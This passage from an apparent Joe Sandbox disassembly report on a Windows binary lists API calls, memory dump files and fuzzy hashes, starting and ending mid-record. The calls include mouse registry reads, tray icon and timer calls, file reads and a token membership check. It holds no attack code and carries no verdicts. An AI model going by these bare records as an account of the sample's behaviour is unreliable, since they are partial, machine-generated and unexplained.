                                                                                                                                                                                                                                      • Instruction ID: fc38eb2eb2b86eed3af61844610bc9bffe4f0e1a7fa93e94b9cccfd6138aca7b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6384b5f6f167dcffeda29badab368129e4308e8c0ea877aef98a437e4687d015
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59515B35A04249DFCB05DF59C494CA9BBF0FF49358B0491A9E809AB362D731ED8ACF85
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E6469C,SwapMouseButtons,00000004,?), ref: 00E646CD
                                                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E6469C,SwapMouseButtons,00000004,?), ref: 00E646EE
                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00E6469C,SwapMouseButtons,00000004,?), ref: 00E64710
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                      • Opcode ID: 989a05ee230cd7f54838977c80be7e11532d9cb32698763f0119aa54a08eaaae
                                                                                                                                                                                                                                      • Instruction ID: 5dcabfde98fbdbb58344f37c58e6c7250880442e35c0b2dd6e212c6445e3744f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 989a05ee230cd7f54838977c80be7e11532d9cb32698763f0119aa54a08eaaae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82119AB5510208BFDB208F64EC84DEF7BB9EF41784F00641AE801E3150E730AE45DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00EE8B4E
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00EE8B55
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00EE8D36
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 146820519-0
                                                                                                                                                                                                                                      • Opcode ID: f684fe71eed7f1d6698d7c1ed4315d85eb01710d9aad7c6c36a128e5cb8b2426
                                                                                                                                                                                                                                      • Instruction ID: 4462bf0db75da2c97b2fc864da451f1f5aff384305f54ae031c325942a0dc4af
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f684fe71eed7f1d6698d7c1ed4315d85eb01710d9aad7c6c36a128e5cb8b2426
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6129C71A083448FC714CF29C584B2ABBE5FF84318F14995DE889AB392DB31ED45CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E62198: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E621C9
                                                                                                                                                                                                                                        • Part of subcall function 00E62198: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E621D1
                                                                                                                                                                                                                                        • Part of subcall function 00E62198: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E621DC
                                                                                                                                                                                                                                        • Part of subcall function 00E62198: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E621E7
                                                                                                                                                                                                                                        • Part of subcall function 00E62198: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E621EF
                                                                                                                                                                                                                                        • Part of subcall function 00E62198: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E621F7
                                                                                                                                                                                                                                        • Part of subcall function 00E6211F: RegisterWindowMessageW.USER32(00000004,?,00E61899), ref: 00E62177
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E6193F
                                                                                                                                                                                                                                      • OleInitialize.OLE32 ref: 00E6195D
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000,00000000), ref: 00EA299B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Virtual$ChangeCloseFindHandleInitializeMessageNotificationRegisterWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2135498668-0
                                                                                                                                                                                                                                      • Opcode ID: d6847a13e8d0dc84fea7ea4980db35ea6facb4e092480696446958ddc5017279
                                                                                                                                                                                                                                      • Instruction ID: c7ca2af6160906226d4fe17806504347862c305886d07f60559641eed6811771
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6847a13e8d0dc84fea7ea4980db35ea6facb4e092480696446958ddc5017279
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E571BFB09052488EC7C8EF7DFC6A6193AE3FB88365718912AD549E7362EB704645FF10
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000001,?,00000000), ref: 00E65BC6
                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00E65BD6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                      • Opcode ID: 9409c6deb19992321529e58da012b5de93853797dd09a89f81e50279ddd198b6
                                                                                                                                                                                                                                      • Instruction ID: d9bba7e44c5df59c634f5e686b41896fd39931540bdc8b6852012458080e9777
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9409c6deb19992321529e58da012b5de93853797dd09a89f81e50279ddd198b6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91316D72B40A09FFDB14CF28D880B99B7B5FB48354F14922AE915A7240C7B1FE94CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E62960: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E62A50
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ECC90F
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00ECC917
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00ECC926
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3500052701-0
                                                                                                                                                                                                                                      • Opcode ID: 48989399c71632092c5b6dcb9b41df687696c7c2e54e7861009755dc6eb508f2
                                                                                                                                                                                                                                      • Instruction ID: 319539b97426b75a8fac68cf51fcac4f07bd72d31ce5a75f919ae0d4b4d63938
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48989399c71632092c5b6dcb9b41df687696c7c2e54e7861009755dc6eb508f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C31C571904344AFEB22CF24C885BE7BBECAB46308F14149ED6DDA7241C7752A85CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00EC1D16
                                                                                                                                                                                                                                      • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 00EC1D2B
                                                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 00EC1D3B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                                                                                      • Opcode ID: 03861dd00b0b49ac769196fcb76a47a8af0e76405a2bc617f9381f6987c02a2b
                                                                                                                                                                                                                                      • Instruction ID: 15a8096ecd2377b3fcc8249848c24d36f129c5766521cf95b7d5bf2f0bf27d2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03861dd00b0b49ac769196fcb76a47a8af0e76405a2bc617f9381f6987c02a2b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFF0F471950309BFDB00DBE5DD89EAEBBBEEB04205F5044A5A901E2181E774AA49DA14
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00E6E0EB
                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00E6E0F9
                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E6E10F
                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00E6E121
                                                                                                                                                                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00EB224B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3288985973-0
                                                                                                                                                                                                                                      • Opcode ID: 3e461d0d4708e2a34a6e58bf57eba2748f94912b297d38d77d0ce383c1516702
                                                                                                                                                                                                                                      • Instruction ID: d7b1149e353f07f48dacdb028d80648c814c5a54b399227cb8f818fff0161634
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e461d0d4708e2a34a6e58bf57eba2748f94912b297d38d77d0ce383c1516702
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF0E230608340DBE7709BA0EC48FEB37ADEF84314F00591AE609E70D0DB309048DB22
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00ED090E,00000000,?,00000000,?,00EA298E,00000000), ref: 00ED0B39
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00ED090E,00000000,?,00000000,?,00EA298E,00000000), ref: 00ED0B41
                                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(00000000,?,00ED090E,00000000,?,00000000,?,00EA298E,00000000), ref: 00ED0B48
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess$DuplicateHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294930198-0
                                                                                                                                                                                                                                      • Opcode ID: 24de19f5d8a805ef374000d110d47473fb50349a0c0e5c68af4bff51be75107e
                                                                                                                                                                                                                                      • Instruction ID: 8ac2300e22e233fe4d45940f004a9795837eca1bb5d4aeb3496bc718c136a0d9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24de19f5d8a805ef374000d110d47473fb50349a0c0e5c68af4bff51be75107e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CD05E77149306BFC7011B96EC09F7E7F7EDBC6B2AF14401AF709A62508AB08805D621
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00EA319B
                                                                                                                                                                                                                                        • Part of subcall function 00E6462F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E64609,?,?,00EA3BD6,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E6464F
                                                                                                                                                                                                                                        • Part of subcall function 00E62A8C: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E62AAB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                                                                      • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                      • Opcode ID: 95885fdcb1f235ba049ab5f3a61268611ff60e65b6ca9e6961cce0dbb3ee779a
                                                                                                                                                                                                                                      • Instruction ID: 05576840618d15712f9b8cc9af020622169d55ec8943217f5f248a4bbbae6de4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95885fdcb1f235ba049ab5f3a61268611ff60e65b6ca9e6961cce0dbb3ee779a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1321D570A002589BDB11EF94EC057DE7BFDAF49314F00501AE504BB281DBF49A899F61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00010000,?,00000000,00000002,?,00000001,?,?,00E69DA6,?,?,?), ref: 00E69F6C
                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000002,?,00000001,?,?,00E69DA6,?,?,?), ref: 00EAF69E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                                                                                      • Opcode ID: 5a1e3d25e3967449632c433aa685b7aed9ffcdc7ee6e7ba5a12b023cef543a18
                                                                                                                                                                                                                                      • Instruction ID: a8cd5c2bfee8197b420cb447d3364d4b1d57cdccc98d1861dbd94911add5c1d4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a1e3d25e3967449632c433aa685b7aed9ffcdc7ee6e7ba5a12b023cef543a18
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F91F370A44204EBDF10CF55D8807A9B7F8FF06350F1491A5E819EF286D376E941DBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E62945
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1144537725-0
                                                                                                                                                                                                                                      • Opcode ID: e88f3bcb4e937d4418c419567c96c7dd33e80726e6bf5f1aa52d6ecafb42ee51
                                                                                                                                                                                                                                      • Instruction ID: fd3a9a20443dd75ca6ef56cc96d3e8d2d92ee25b8ca40316e0f2869245923709
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e88f3bcb4e937d4418c419567c96c7dd33e80726e6bf5f1aa52d6ecafb42ee51
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A3182716047058FE361DF34E884797BBE8FB89758F00182EF69AA7240E775A948CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00E94E11
                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 00E94E23
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                                                                                                                      • Opcode ID: 83fe2f1a20694c52997f4fa9ea9aaf199eddaca22cd990bdfec3d6d8cee278ed
                                                                                                                                                                                                                                      • Instruction ID: 73062c440ae793fec7e80dbe03b347b4e5e0f2663c6687364a9334e11e53cf3e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83fe2f1a20694c52997f4fa9ea9aaf199eddaca22cd990bdfec3d6d8cee278ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF11A5F55187514ACF304A3E8C88E227B95B796338F382B19D1B6AB5F1C320D8879641
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,00E9884C,?,00F29CD8,0000000C), ref: 00E98984
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00E9884C,?,00F29CD8,0000000C), ref: 00E9898E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
